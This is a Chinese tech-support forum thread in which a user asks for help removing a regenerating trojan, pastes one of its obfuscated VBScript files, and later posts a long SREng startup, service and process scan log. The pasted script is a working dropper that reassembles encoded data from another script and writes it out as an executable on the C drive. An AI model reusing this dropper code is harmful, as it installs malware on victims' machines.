trojan.win32.vb.eks有人会杀吗?
在C盘会生成一个任意名字的.exe文件,以及2个.vbs文件,卡巴报EXE文件trojan.win32.vb.eks病毒,自动杀掉,.VBS文件还在而且会增加体积,删除后会再生,卡巴继续报毒,系统会时不时多一个CMD.EXE进程。全盘查毒未有发现。网上找了下都说是跟上网有关,断网就不会报毒了,但是没人知道原因和杀法。
附其中一个VBS文件的代码,另一个打开了全是数字字母什么的,有达人来解决吗?
oN ErROR reSUmE nexT:S=1:Do:sEt G=CREaTeoBjeCt("ScrIptiNG.fILESYSTEMObJECT"):do WHILe G.filEexISTs("C:\flznfi.vbs")=fALSe:wSCRIPT.sleep(1000):LOOp:SEt f=g.opEntExtfILE("C:\flznfi.vbs",1):do WHile F.ATenDoFStREam=fALSe:l=f.REAdLiNe:O=leN(L):n=LEFt(L,2):SElecT CAsE trUE:caSe ISnUmeRIc(N)=FAlSe:casE o=3947+3 ANd InT(N)=S:E=e+miD(L,3,3947):s=S+1:cAse o=3671+3 and iNt(n)=S:E=E+MId(l,3,3671):s=S+1:eNd sElecT:lOop:F.ClOSe:If 60+1=S THEn:J=len(E)/2:SeT V=CreaTEoBJECT("aDOdB.REcoRDset"):v.fiElds.aPPeNd "m",205,j:V.oPeN:v.ADdnew:V("M")=E:v.upDATe:E=V("m").gETcHUNK(j):wiTh CREaTeOBJECt("AdOdB.STrEam"):.MODe=3:.Type=1:.OpeN():.write e:.SAVeTOFilE "C:\qqionjy.exe",2:enD wItH:wSCript.qUiT:eNd iF:WSCRIpT.Sleep(200):LoOp 请使用Sreng扫描日志之后发上来。 最好吧文件发上来看看 没Sreng日志神仙也救不了你
试试这个
windows清理助手 [url]http://www.greendown.cn/soft/4421.html[/url] SREngLOG 有,达人来帮忙看看
[code]
2008-08-29,14:12:56
System Repair Engineer 2.6.12.1018
Smallfrogs (http://www.KZTechs.com)
Windows XP Professional Service Pack 2 (Build 2600) - 管理权限用户 - 完整功能
以下内容被选中:
所有的启动项目(包括注册表、启动文件夹、服务等)
浏览器加载项
正在运行的进程(包括进程模块信息)
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件
进程特权扫描
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Publisher]
<AlfaClock Classic><"D:\Program Files\AlfaClock\AlfaClock.exe" /startup> [AlfaSoft Research Labs]
<RAMSaverPro><c:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe> []
<Fetion><D:\Program Files\China Mobile\Fetion\Fetion.exe> [China Mobile]
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<load><> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<cFosSpeed><C:\Program Files\cFosSpeed\cFosSpeed.exe> [cFos Software GmbH]
<AVP><"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe"> [(Verified)Kaspersky Lab]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Windows Component Publisher]
<Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Windows Publisher]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<UIHost><logonui.exe> [(Verified)Microsoft Windows Publisher]
[HKEY_CURRENT_USER\Control Panel\Desktop]
<SCRNSAVE.EXE><C:\WINDOWS\system32\LCD-SVR.SCR> [Gate2.NET, contact: admin@Gate2.NET]
==================================
启动文件夹
[adsl]
<C:\Documents and Settings\cyscys\「开始」菜单\程序\启动\adsl.lnk --> [File is missing]><N>
==================================
服务
[Ati HotKey Poller / Ati HotKey Poller][Stopped/Disabled]
<C:\WINDOWS\system32\Ati2evxx.exe><ATI Technologies Inc.>
[ATI Smart / ATI Smart][Stopped/Manual Start]
<C:\WINDOWS\system32\ati2sgag.exe><>
[卡巴斯基反病毒软件 7.0 / AVP][Running/Auto Start]
<"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\avp.exe" -r><Kaspersky Lab>
[cFosSpeed System Service / cFosSpeedS][Running/Auto Start]
<"C:\Program Files\cFosSpeed\spd.exe" -service><cFos Software GmbH>
[Clip Book server / Clip Book server][Stopped/Auto Start]
<C:\Program Files\Internet Explorer\help.com><(File is missing)>
[Cmb WebProtect Support / CMBWPS][Running/Auto Start]
<C:\Program Files\CMBCHINA\WebProtect\WPService.exe /start><China Merchants Bank>
[Google Updater Service / gusvc][Stopped/Disabled]
<"C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe"><Google>
[ServiceLayer / ServiceLayer][Stopped/Manual Start]
<"C:\Program Files\PC Connectivity Solution\ServiceLayer.exe"><Nokia.>
[Windows Live Setup Service / WLSetupSvc][Stopped/Manual Start]
<"C:\Program Files\Windows Live\installer\WLSetupSvc.exe"><Microsoft Corporation>
==================================
驱动程序
[标准 IDE/ESDI 硬盘控制器 / atapi][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\atapi.sys><N/A>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[cFosSpeed Miniport / cFosSpeed][Running/Manual Start]
<system32\DRIVERS\cfosspeed.sys><cFos Software GmbH>
[CMB8100 / CMB8100][Running/Auto Start]
<\??\C:\WINDOWS\system32\Drivers\CertClient.dat><N/A>
[CMBProtector / CMBProtector][Running/Auto Start]
<\??\C:\WINDOWS\system32\Drivers\CMBProtector.dat><N/A>
[d346bus / d346bus][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\d346bus.sys><>
[d346prt / d346prt][Running/Boot Start]
<\SystemRoot\System32\Drivers\d346prt.sys><>
[VIA PCI 10/100Mb Fast Ethernet Adapter NT Driver / FETNDIS][Stopped/Manual Start]
<system32\DRIVERS\fetnd5.sys><VIA Technologies, Inc.>
[kl1 / kl1][Running/Boot Start]
<\SystemRoot\system32\drivers\kl1.sys><Kaspersky Lab>
[klif / klif][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
[Kaspersky Anti-Virus NDIS Filter / klim5][Running/Manual Start]
<system32\DRIVERS\klim5.sys><Kaspersky Lab>
[Nokia USB Phone Parent / nmwcd][Stopped/Manual Start]
<system32\drivers\nmwcd.sys><Nokia>
[Nokia USB Generic / nmwcdc][Stopped/Manual Start]
<system32\drivers\nmwcdc.sys><Nokia>
[Nokia USB Port / nmwcdcj][Stopped/Manual Start]
<system32\drivers\nmwcdcj.sys><Nokia>
[Nokia USB Modem / nmwcdcm][Stopped/Manual Start]
<system32\drivers\nmwcdcm.sys><Nokia>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[Realtek RTL8029(AS)-based PCI Ethernet Adapter NT Driver / rtl8029][Running/Manual Start]
<system32\DRIVERS\RTL8029.SYS><Realtek Semiconductor Corporation>
[Secdrv / Secdrv][Stopped/Manual Start]
<system32\DRIVERS\secdrv.sys><N/A>
[viamraid / viamraid][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\viamraid.sys><VIA Technologies inc,.ltd>
[VIA AC'97 Audio Controller (WDM) / VIAudio][Running/Manual Start]
<system32\drivers\viaudio.sys><VIA Technologies, Inc.>
[videX32 / videX32][Running/Boot Start]
<\SystemRoot\system32\DRIVERS\videX32.sys><VIA Technologies, Inc.>
[WINIO / WINIO][Stopped/Manual Start]
<\??\D:\Program Files\按键精灵\winio.sys><N/A>
==================================
浏览器加载项
[ThunderAtOnce Class]
{01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[WebProtect]
{53763D1D-9CA8-4C7C-9756-A8E6B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
{7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[TN插件]
{960571B5-9178-4F29-B366-0585C526BAB0} <C:\WINDOWS\system32\TNBHO.dll, tntn8.Com>
[Google Toolbar Helper]
{AA58ED58-01DD-4d91-8333-CF10577473F7} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Google Toolbar Notifier BHO]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[Web 反病毒统计]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\SCIEPlgn.dll, (Signed) Kaspersky Lab>
[信息检索(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL, (Signed) Microsoft Corporation>
[&Google]
{2318C2B1-4965-11d4-9B18-009027A5CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[UploadControl Control]
{52FF336D-A05D-4A14-A3A1-7B6B4B427F88} <C:\WINDOWS\system32\UPLOAD~1.OCX, 广州网易互动娱乐有限公司>
[163Uploader Control]
{8686F2A6-DC01-4E8F-BDE3-DCC7DBBAD6AE} <C:\WINDOWS\system32\163UPL~1.OCX, 广州网易互动娱乐有限公司>
[AxSubmitControl Class]
{8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
{8FEFF364-6A5F-4966-A917-A3AC28411659} <C:\PROGRA~1\SopCast\sopocx.ocx, www.sopcast.com>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[ThunderAtOnce Class]
{01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[]
{09BA8F6D-CB54-424B-839C-C2A6C8E6B436} <, >
[]
{0A155D3C-68E2-4215-A47A-E800A446447A} <, >
[EWA Control]
{18226BF8-DC0B-4D81-80E9-A41AE37BB73A} <C:\PROGRA~1\PPLive\SYNACA~2.OCX, (Signed) Synacast>
[]
{1F460357-8A94-4D71-9CA3-AA4ACF32ED8E} <, >
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, (Signed) Microsoft Corporation>
[&Google]
{2318C2B1-4965-11D4-9B18-009027A5CD4F} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[HTML Document]
{25336920-03F9-11CF-8FD0-00AA00686F13} <%SystemRoot%\system32\mshtml.dll, (Signed) N/A>
[xsey.lnuvsm]
{2BD1B2F3-CF67-4101-9E4E-FCDCD8F103F5} <, >
[DHTML Edit Control Safe for Scripting for IE5]
{2D360201-FFF5-11D1-8D03-00A0C959BC0A} <C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx, (Signed) Microsoft Corporation>
[Tabular Data Control]
{333C7BC4-460F-11D0-BC04-0080C7055A83} <C:\WINDOWS\system32\tdc.ocx, (Signed) Microsoft Corporation>
[]
{3AA9CF07-DF20-48FF-98BE-DED276E40146} <, >
[Thunder Agent Class]
{485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\Program Files\Thunder Network\Thunder\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD>
[EditCtrl Class]
{488A4255-3236-44B3-8F27-FA1AECAA8844} <C:\WINDOWS\system32\aliedit\aliedit.dll, (Signed) >
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, (Signed) Microsoft Corporation>
[WebProtect]
{53763D1D-9CA8-4C7C-9756-A8E6B8FC063B} <C:\Program Files\CMBCHINA\WebProtect\WebProtect.dll, (Signed) China Merchants Bank>
[]
{5CB840B5-A94E-4AD9-B785-4866E3B04476} <, >
[WUWebControl Class]
{6414512B-B978-451D-A0D8-FCFDF33E833C} <C:\WINDOWS\system32\wuweb.dll, (Signed) Microsoft Corporation>
[XMP Class]
{6483F145-A768-4C41-AACC-52D4D7845851} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, >
[XDRM]
{693571CB-54A3-4E90-9D52-EEAE1334E2D3} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, >
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[WangWangObj Class]
{6E213FC7-DD5A-4115-B7E6-D4C7838C361E} <D:\Program Files\Alisoft\WangWang\WangWangX4.dll, 阿里巴巴软件(上海)有限公司>
[]
{6E5E167B-1566-4316-B27F-0DDAB3484CF7} <, >
[Active Desktop Mover]
{72267F6A-A6F9-11D0-BC94-00C04FB67863} <%SystemRoot%\system32\SHELL32.dll, (Signed) N/A>
[AxInputControl Class]
{73E4740C-08EB-4133-896B-8D0A7C9EE3CD} <C:\WINDOWS\DOWNLO~1\INPUTC~1.DLL, >
[MediaComm Class]
{7670648D-461B-42AF-BDFE-46D26AF5EFF2} <d:\Program Files\Thunder Network\Thunder\Components\InMedia\MediaAddin14.dll, Thunder Networking Technologies,LTD>
[]
{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A} <, >
[]
{7E853D72-626A-48EC-A868-BA8D5E23E045} <, >
[]
{7FC22A16-79E6-4787-9C96-B6359BB1106D} <, >
[Microsoft Web 浏览器]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\shdocvw.dll, (Signed) Microsoft Corporation>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll, (Signed) Thunder Networking Technologies,LTD>
[AxSubmitControl Class]
{8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} <C:\WINDOWS\DOWNLO~1\SUBMIT~1.DLL, >
[SopCore Control]
{8FEFF364-6A5F-4966-A917-A3AC28411659} <C:\PROGRA~1\SopCast\sopocx.ocx, www.sopcast.com>
[]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <, >
[TN插件]
{960571B5-9178-4F29-B366-0585C526BAB0} <C:\WINDOWS\system32\TNBHO.dll, tntn8.Com>
[RMGetLicense Class]
{A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, (Signed) Microsoft Corporation>
[Google Toolbar Helper]
{AA58ED58-01DD-4D91-8333-CF10577473F7} <c:\program files\google\googletoolbar1.dll, (Signed) Google Inc.>
[Thunder DapCtrl]
{ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapCtrl1.2.11.14.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[Microsoft Scriptlet Component]
{AE24FDAE-03C6-11D1-8B76-0080C744F389} <C:\WINDOWS\system32\mshtml.dll, (Signed) Microsoft Corporation>
[Google Toolbar Notifier BHO]
{AF69DE43-7D58-4638-B6FA-CE66B5AD205D} <C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll, (Signed) Google Inc.>
[SearchAssistantOC]
{B45FF030-4447-11D2-85DE-00C04FA35C89} <%SystemRoot%\system32\shdocvw.dll, (Signed) N/A>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, (Signed) Microsoft Corporation>
[]
{CA828031-4325-11D4-BDB2-00105A776E78} <, >
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[AUDIO__X_MS_WMA Moniker Class]
{CD3AFA84-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, (Signed) Microsoft Corporation>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx, (Signed) Adobe Systems, Inc.>
[]
{DC7094C6-8F61-42ED-AECE-63F5EEF647C5} <, >
[Thunder DapPlayer]
{EEDD6FF9-13DE-496B-9A1C-D78B3215E266} <d:\Program Files\Thunder Network\Thunder\Components\DownAndPlay\DapPlayer3.0.40.64.475.dll, ShenZhen Thunder Networking Technologies Ltd.>
[XPPlayer Class]
{F3E70CEA-956E-49CC-B444-73AFE593AD7F} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\pplayer.dll_1_work, Thunder>
[]
{FB5F1910-F110-11D2-BB9E-00C04F795683} <, >
[使用迅雷下载]
<D:\Program Files\Thunder Network\Thunder\Program\geturl.htm, N/A>
[使用迅雷下载全部链接]
<D:\Program Files\Thunder Network\Thunder\Program\getallurl.htm, N/A>
[导出到 Microsoft Office Excel(&X)]
<res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000, N/A>
[用比特精灵下载(&B)]
<D:\Program Files\BitSpirit\bsurl.htm, N/A>
[设为 Messenger Live 头像]
<C:\Program Files\MSNShell\Bin\SetMSNDP.htm, N/A>
==================================
正在运行的进程
[PID: 1000 / SYSTEM][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1164 / SYSTEM][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1196 / SYSTEM][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\Ati2evxx.dll] [ATI Technologies Inc., 6.14.10.4176]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\msadp32.acm] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1240 / SYSTEM][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1252 / SYSTEM][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1408 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1508 / NETWORK SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1620 / SYSTEM][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1780 / LOCAL SERVICE][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 1884 / SYSTEM][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)]
[C:\WINDOWS\system32\mdimon.dll] [Microsoft Corporation, 11.3.2175.0]
[C:\WINDOWS\System32\spool\PRTPROCS\W32X86\mdippr.dll] [Microsoft Corporation, 11.3.2175.0]
[PID: 372 / cyscys][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
[D:\Program Files\AlfaClock\TrayClock.dll] [N/A, ]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[PID: 520 / cyscys][C:\Program Files\cFosSpeed\cFosSpeed.exe] [cFos Software GmbH, 3.11.1177]
[PID: 576 / cyscys][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 604 / cyscys][D:\Program Files\AlfaClock\AlfaClock.exe] [AlfaSoft Research Labs, 1.8.2.722]
[D:\Program Files\AlfaClock\TrayClock.dll] [N/A, ]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 632 / cyscys][C:\Program Files\WinTools\RAM Saver Pro\ramsaverpro.exe] [N/A, ]
[PID: 728 / SYSTEM][C:\Program Files\cFosSpeed\spd.exe] [cFos Software GmbH, 3.11.1177]
[PID: 760 / SYSTEM][C:\Program Files\CMBCHINA\WebProtect\WPService.exe] [China Merchants Bank, 1, 0, 0, 1]
[C:\Program Files\CMBCHINA\WebProtect\WebProtectPlus.dll] [China Merchants Bank, 1, 0, 0, 1]
[PID: 864 / SYSTEM][C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE] [Microsoft Corporation, 7.00.9466]
[C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\2052\mdmui.dll] [Microsoft Corporation, 7.00.9466]
[PID: 1036 / SYSTEM][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 2172 / cyscys][D:\Program Files\BitSpirit\BitSpirit.exe] [LANSPIRIT.NET, 3.3.2.100]
[D:\Program Files\BitSpirit\BSOPLIB.DLL] [, 1, 0, 0, 3]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[PID: 3260 / cyscys][C:\WINDOWS\explorer.exe] [Microsoft Corporation, 6.00.2900.3156 (xpsp_sp2_gdr.070613-1234)]
[D:\Program Files\Thunder Network\Thunder\ComDlls\TDAtOnce_Now.dll] [Thunder Networking Technologies,LTD, 1.0.5.29]
[D:\Program Files\Thunder Network\Thunder\ComDlls\xunleiBHO_Now.dll] [Thunder Networking Technologies,LTD, 5, 0, 8, 55]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DsBho_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 18]
[D:\Program Files\Thunder Network\Thunder\Components\ResWorker\DataProcessor_00.dll] [Thunder Networking Technologies,LTD, 1, 0, 0, 16]
[C:\Program Files\Microsoft Office\OFFICE11\msohev.dll] [Microsoft Corporation, 11.0.5510]
[d:\Program Files\WinRAR\rarext.dll] [N/A, ]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\ShellEx.dll] [Kaspersky Lab, 7.0.1.325]
[d:\Program Files\EditPlus 3\eppshell.dll] [N/A, ]
[C:\WINDOWS\system32\contmenu.dll] [N/A, ]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Nokia\Nokia PC Suite 6\phonebrowser.dll] [Nokia, 6, 85, 89, 5]
[C:\Program Files\Nokia\Nokia PC Suite 6\PCSCM.dll] [Nokia, 6, 85, 107, 6]
[C:\Program Files\Nokia\Nokia PC Suite 6\Lang\PhoneBrowser_chi-sc.nlr] [Nokia, 6, 85, 59, 0]
[C:\Program Files\Nokia\Nokia PC Suite 6\Resource\PhoneBrowser_Nokia.ngr] [Nokia, 6, 85, 17, 0]
[PID: 2276 / cyscys][C:\Program Files\Windows Live\Messenger\msnmsgr.exe] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\MSNCore.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\msidcrl40.dll] [Microsoft Corporation, 4.100.313.1]
[C:\Program Files\Windows Live\Messenger\ContactsUX.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\CRYPTNET.dll] [N/A, ]
[C:\Program Files\MSNShell\Bin\ShellDll02.dll] [MSNShell Team, 4.3.11.12]
[C:\Program Files\Windows Live\Messenger\msgslang.8.5.1302.1018.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\msgsres.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\MSNShell\Bin\ShellDll.dll] [N/A, ]
[C:\Program Files\Windows Live\Messenger\MSGSWCAM.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\WINDOWS\system32\sirenacm.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\WINDOWS\system32\msdmo.dll] [, ]
[C:\Program Files\Windows Live\Messenger\lmcdata.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\contact.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Windows Live\Messenger\custsat.dll] [Microsoft Corporation, 9.0.3790.2428 (srv03_sp1_qfe.050422-1043)]
[C:\Program Files\Windows Live\Messenger\abssm.dll] [Microsoft Corporation, 8.5.1302.1018]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl] [Kaspersky Lab, 7.0.1.325]
[C:\WINDOWS\system32\msacm32.drv] [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
[C:\WINDOWS\system32\SOGOUPY.IME] [Sohu.com Inc., 3, 1, 0, 0]
[C:\Program Files\SogouInput\Plugin\SgImeWord.dll] [, 1, 0, 0, 31]
[C:\WINDOWS\system32\Macromed\Flash\Flash9e.ocx] [Adobe Systems, Inc., 9,0,115,0]
[PID: 2272 / cyscys][C:\WINDOWS\system32\taskmgr.exe] [Microsoft Corporation, 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)]
[PID: 3904 / cyscys][D:\Program Files\maxthon\Maxthon.exe] [Maxthon International Ltd., 1, 5, 9, 80]
[D:\Program Files\maxthon\maxzlib.dll] [ , 1, 0, 0, 2]
[C:\WINDOWS\system32\odbcbcp.dll] [Microsoft Corporation, 2000.085.1117.00 (xpsp_sp2_rtm.040803-2158)]
[D:\Program Files\maxthon\Services\RealTime\real_time.dll] [, 1, 0, 0, 1]
[C:\WINDOWS\system32\SOGOUPY.IME] [Sohu.com Inc., 3, 1, 0, 0]
[C:\Program Files\SogouInput\Plugin\SgImeWord.dll] [, 1, 0, 0, 31]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\scrchpg.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\klscav.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prremote.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prloader.dll] [Kaspersky Lab, 7.0.1.325]
[C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\prkernel.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\params.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\pxstub.ppl] [Kaspersky Lab, 7.0.1.325]
[c:\program files\kaspersky lab\kaspersky anti-virus 7.0\tempfile.ppl] [Kaspersky Lab, 7.0.1.325]
